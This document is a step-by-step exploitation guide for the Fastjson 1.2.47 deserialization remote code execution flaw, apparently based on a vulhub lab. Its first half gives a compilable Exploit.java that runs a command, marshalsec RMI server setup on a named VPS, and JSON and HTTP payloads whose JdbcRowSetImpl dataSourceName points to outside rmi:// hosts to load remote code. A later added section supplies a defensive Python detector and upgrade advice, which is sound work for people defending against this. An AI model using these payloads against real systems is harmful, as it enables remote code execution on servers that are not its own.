Fastjson 1.2.47 Remote Command Execution Vulnerability

# Reference: https://vulhub.org/#/environments/fastjson/1.2.47-rce/

1. Generate and compile the attack class Exploit.class. # Pitfall: compiling Java on CentOS depends on the installed Java version; on Linux it compiles successfully with java version "1.8.0_141".

Save the code below as Exploit.java,
then run javac Exploit.java to produce the class file.

import java.lang.Runtime;
import java.lang.Process;
public class Exploit {

    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"touch", "/tmp/success"};
            Process pc = rt.exec("ping fastjson.t00ls.7272e87394b4f7c0088c966cba58c1dd.tu4.org");
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }

}

2. On the VPS, start an RMI server
Place Exploit.class in the web root of the VPS so that http://vps.0535code.com/Exploit.class can be fetched directly.
# Then download marshalsec-0.0.3-SNAPSHOT-all.jar and run on the VPS:
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://vps.0535code.com/#Exploit"
# The RMI server listens only on port 1099 by default

3. Construct the payload:
Add content-type: application/json to the request headers and remove the other redundant fields such as Accept: *****

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://vps.0535code.com:1099/Exploit",
        "autoCommit":true
    }
}

or

POST / HTTP/1.1
Host: 192.168.8.128:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept-Encoding: gzip, deflate
content-type:application/json
Content-Length: 195

{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://111.38s7vp.ceye.io/TouchFile","autoCommit":true}}
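The payload above works because the "a" object with "@type":"java.lang.Class" and a "val" of com.sun.rowset.JdbcRowSetImpl primes Fastjson's type cache, after which the "b" object is deserialized as that class and its dataSourceName triggers a JNDI lookup to the attacker's RMI server. The following detector is an added example written from the defender's side; it is not code from the original post, vulhub or Fastjson. It walks a request body and flags the three indicators that make up this pattern (the java.lang.Class cache-priming object, a known JNDI gadget as @type, and any rmi:// or ldap:// style URL in a string value), and falls back to a raw-text check when the body is not strict JSON, since Fastjson accepts input that json.loads rejects. The sample bodies and the hostname attacker.example are constructed for the example.

```python
import json
import re

# Gadget classes this page's payload relies on. Assumption: a real deployment
# extends this set with the other JNDI-capable classes its Fastjson version accepts.
JNDI_GADGET_CLASSES = {
    "com.sun.rowset.JdbcRowSetImpl",
}

# URL schemes that make a deserialized JdbcRowSetImpl perform a JNDI lookup.
JNDI_SCHEMES = ("rmi://", "ldap://", "ldaps://", "iiop://")

# Raw-text fallback for bodies that strict JSON parsing rejects.
_RAW_TYPE_RE = re.compile(r'"@type"\s*:', re.IGNORECASE)


def _walk(node, path, findings):
    """Recursively inspect a parsed JSON value, appending (json_path, reason) findings."""
    if isinstance(node, dict):
        type_name = node.get("@type")
        if type_name == "java.lang.Class" and isinstance(node.get("val"), str):
            # Step one of the bypass: load a class name into the autoType cache.
            findings.append((path, f"java.lang.Class primes autoType cache with {node['val']}"))
        elif isinstance(type_name, str) and type_name in JNDI_GADGET_CLASSES:
            # Step two: instantiate the cached gadget class directly.
            findings.append((path, f"known JNDI gadget @type {type_name}"))
        for key, value in node.items():
            _walk(value, f"{path}.{key}", findings)
    elif isinstance(node, list):
        for i, value in enumerate(node):
            _walk(value, f"{path}[{i}]", findings)
    elif isinstance(node, str):
        # Step three: the dataSourceName (or any string) pointing at a JNDI server.
        if node.lower().startswith(JNDI_SCHEMES):
            findings.append((path, f"JNDI URL {node}"))


def scan_body(body):
    """Return a list of (json_path, reason) findings for one JSON request body."""
    try:
        doc = json.loads(body)
    except ValueError:
        # Fastjson is more lenient than json.loads, so do not silently pass
        # an unparsable body: look for the same indicators in the raw text.
        findings = []
        if _RAW_TYPE_RE.search(body):
            findings.append(("$", "unparsable body contains an @type key"))
        for scheme in JNDI_SCHEMES:
            if scheme in body.lower():
                findings.append(("$", f"unparsable body contains {scheme} URL"))
        return findings
    findings = []
    _walk(doc, "$", findings)
    return findings


def is_suspicious(body):
    """True when the body shows any indicator of the JdbcRowSetImpl/JNDI pattern."""
    return bool(scan_body(body))


# Constructed sample bodies (not the original post's target): the first mirrors
# the payload shape above, the second is a benign document with a JDBC URL.
SAMPLE_BODIES = {
    "bypass": '{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},'
              '"b":{"@type":"com.sun.rowset.JdbcRowSetImpl",'
              '"dataSourceName":"rmi://attacker.example:1099/Exploit","autoCommit":true}}',
    "benign": '{"user":"alice","roles":["admin"],"dataSourceName":"jdbc:h2:mem:test"}',
}

if __name__ == "__main__":
    for name, body in SAMPLE_BODIES.items():
        print(name, "->", scan_body(body))
```

Run over captured application/json bodies (a WAF log, a proxy capture, or an application-level request filter), the detector reports each indicator with its JSON path, so a single finding is enough to alert while all three together identify this exact chain. Detection is a stopgap: the fix for the application is to upgrade Fastjson past 1.2.47 and, on versions that support it, enable safeMode so that @type is ignored entirely.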
